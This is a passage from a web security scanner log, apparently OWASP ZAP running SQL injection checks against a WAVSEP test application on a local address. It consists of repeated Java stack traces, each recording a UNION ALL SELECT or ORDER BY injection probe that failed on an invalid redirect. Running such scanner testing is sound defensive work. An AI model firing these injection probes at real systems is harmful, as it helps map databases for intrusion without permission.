http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962892 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962894 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962895 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962897 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962898 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962899 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') ORDER BY 4508-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') ORDER BY 4508-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962901 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962902 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962904 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962906 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962908 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962909 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 